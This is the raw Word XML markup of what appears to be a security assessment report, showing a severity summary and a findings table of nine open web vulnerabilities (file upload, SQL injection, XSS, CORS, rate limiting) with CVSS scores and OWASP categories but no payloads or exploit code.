              <w:t>1</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9BB84CF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.3%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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9E2DEA7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="16A34A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>█</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="40341C3D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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9D2BEC8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3B82F6"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10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4EDBA3A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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F0E060D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>0.0%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="150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80B2FC2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="3B82F6"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A2C262E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t>Findings Overview</w:t>
      </w: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left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="895"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="3601"/>
        <w:gridCol w:w="799"/>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="1217"/>
        <w:gridCol w:w="719"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B7CCA" w14:paraId="0E2CC3EC"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7AC17A44" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="649"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6B7C6E73" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1997"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1FA61369" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443"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414370B2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="341"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5347366D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675"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6DFFE4A9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="399" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F46E5"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CF42B46" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="4D3DA5AD"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664DDA5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</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697E386" w14:textId="7379404F"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029</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C006AB0" w14:textId="1166D063" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Unrestricted Upload of File with </w:t>
            </w:r>
            <w:r w:rsidR="00877518">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Dangerous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4709C811" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>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4CFDC1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0</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DAFBD30" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A08:2021-Software and ...</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9F9BFBF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5F423690"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109CCE4" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</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0062804" w14:textId="1160EE2F"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027</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739C51F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Authorization for Sensitive Acti...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E4BFB6C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>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3F93877" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1</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AF819E1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A01:2021-Broken Access...</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B058EC0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="5B1C8BC2"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A3411DA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</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A9D7C04" w14:textId="6F785B0D"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-018</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6AB522F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthenticated Arbitrary File Upload (C...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="057CBFC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>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DD5DB95" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</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055B600" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A08:2021-Software and ...</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333F3CB" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="609264CC"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12A8995" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</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7ED1FDB" w14:textId="692821A9"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-008</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EEBB873" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL Injection - Time-Based Blind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="240FEDD8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>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22437AF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8</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279019B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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3F404B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="053D35A3"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B31C0FF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</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EC5DD23" w14:textId="72D74D96"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-003</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7C17423" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="443" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13913643" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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4DB701F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F1D1D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0</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692F8D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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B520958" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="71216089"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83F5854" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</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12C4523" w14:textId="29C54F31"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031</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653984" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing Rate Limiting</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085C42B7"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6781E14" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5</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926B690" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Desi...</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368F39" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7B422B84"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8815804" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</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51A48D4" w14:textId="590D989A"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030</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C68A968" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unrestricted File Upload and Lack of Rat...</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3637E40E"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934CECC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0</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9EE1631" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A04:2021-Insecure Desi...</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D62479" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="181AF4EC"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8C66EF" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8</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9559B98" w14:textId="2BE263D2"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028</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3ED59C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cross-Origin Resource Sharing (CORS) Mis...</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69958EC5"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9931840" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.5</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B160C52"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7E35AB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="089F26A7"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32B330" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9</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D110DC7" w14:textId="7E713F3B"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026</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24A873A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored Cross-Site Scripting (XSS)</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50328054"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C720290" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.3</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CD9254D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="64748B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A03:2021-Injection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78F6C1" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
